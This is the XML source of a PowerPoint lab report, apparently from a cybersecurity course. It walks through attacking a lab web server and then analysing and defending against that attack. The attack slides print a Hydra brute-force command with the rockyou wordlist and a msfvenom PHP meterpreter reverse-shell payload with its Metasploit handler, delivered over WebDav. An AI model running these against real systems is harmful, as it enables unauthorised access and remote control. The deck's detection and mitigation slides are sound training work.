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8" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="28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064F08-DAD4-4E3A-A708-224B3722818F}">
  <a:tblStyle styleId="{5F064F08-DAD4-4E3A-A708-224B372281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04" y="102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83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24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487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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crack CEO Ryan’s password hash to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebDav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dirty="0"/>
              <a:t> Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>crackstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to crack the unsalted hash and gain his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> login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5632" y="1530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access to company server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0757" y="1429696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C4FB8-3090-4EE5-9F77-0BE8C613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7" y="2871305"/>
            <a:ext cx="2497798" cy="47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8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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload Reverse Shell payload thru </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebDav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dirty="0"/>
              <a:t> Used Ryan’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> credentials to upload a reverse shell payload via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to access reverse shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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5632" y="1530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upload reverse shell .php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0757" y="1429696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</a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> –p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>=192.168.1.90 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>=4444 &gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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msfconsole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 exploit/multi/handler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set payload php/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reverse_tcp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LHOST=192.168.1.90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6114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12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804808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port scan occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Jun 13 16:52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packets were sent, and from which IP? 192.168.1.90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indicates that this was a port scan? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The spike of activity indicates a port scan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8450F9-4114-4775-9082-4C2028AE4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5" y="1706261"/>
            <a:ext cx="7153265" cy="24311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request occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Jun 16, 23:59 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>How many requests were made? 7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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Secret_folder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" sz="1200" dirty="0"/>
              <a:t>What did they contain? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Credentials to login to company server</a:t>
            </a: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6F975C-428B-41D9-A8A6-EF6DF9441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25" y="1715064"/>
            <a:ext cx="5036761" cy="27524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in the attack? 62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had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>discovered the password? 62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907676-C08E-4CFE-8963-B69DBBF05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67" y="1412614"/>
            <a:ext cx="8794865" cy="29895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to this directory? 24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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>shell.php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0C47C9-6AE7-450F-8768-7A35119E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03" y="1713000"/>
            <a:ext cx="6758247" cy="29242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17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  <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Alert on spikes in traffic or pings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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Establish a baseline and set a threshold somewhere above the baseline, say baseline +20% for example.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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Close all ports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Monitor for failed logins to the Secret-folder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Baseline +20%</a:t>
            </a:r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Block on 3 filed logins and alert admin.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Institute password hardening.</a:t>
            </a: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Set a threshold that locks out and sends alert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Depends on baseline, baseline +20%</a:t>
            </a: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Lockout for failed logins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Password hardening</a:t>
            </a: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Failed login policy to alert an admin and only allow login from IP or MAC filtering.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Something very low, no more than 3 failed logins to alert admin and enforce lockout.</a:t>
            </a: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Enforce IP and MAC filtering for logins.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Restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> access from Web?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Alarm upon upload of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> files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1, extremely low this is a very sever and critical Alert.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Block upload of .php files.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Maybe even remove ability to upload files.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[Insert Here]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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali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  <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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1121103326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{5F064F08-DAD4-4E3A-A708-224B3722818F}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806884668"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="120190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{5F064F08-DAD4-4E3A-A708-224B3722818F}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exists. Otherwise, use the common name. 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example: LFI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References to “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Company_folders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Secret_folder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/” on the website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 or hidden data openly referenced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password is easily broken using Hydra on that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secret_folder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webpage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easily found open ports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22 (SSH) and port 80 (HTTP) were both open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These are potential points of entry.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NMAP port scanning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-NMAP to find the open ports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5632" y="1530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-f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ound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point of entry at the webpage: 192.168.1.105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0757" y="1421383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D07F6-A098-47D8-9E33-A88CD6001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7" y="2505709"/>
            <a:ext cx="2616720" cy="9706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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra password brute force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dirty="0"/>
              <a:t> hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt -s 80 -f -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/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5632" y="1530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brute force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ashton’s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password to the “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” page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0757" y="1429696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AFE6D-D98F-444C-B245-09165C223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7" y="2369758"/>
            <a:ext cx="2612728" cy="385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4C4FB8-3090-4EE5-9F77-0BE8C613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57" y="3055846"/>
            <a:ext cx="2497798" cy="47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350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1405</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>233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Roboto</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium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NMAP port scanning</vt:lpstr>
      <vt:lpstr>Exploitation: Hydra password brute force</vt:lpstr>
      <vt:lpstr>Exploitation: Crack CEO Ryan’s password hash to WebDav</vt:lpstr>
      <vt:lpstr>Exploitation: Upload Reverse Shell payload thru WebDav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David Go</dc:creator>
  <cp:lastModifiedBy>David Go</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-24T02:52:02Z</dcterms:modified>
</cp:coreProperties>
</file>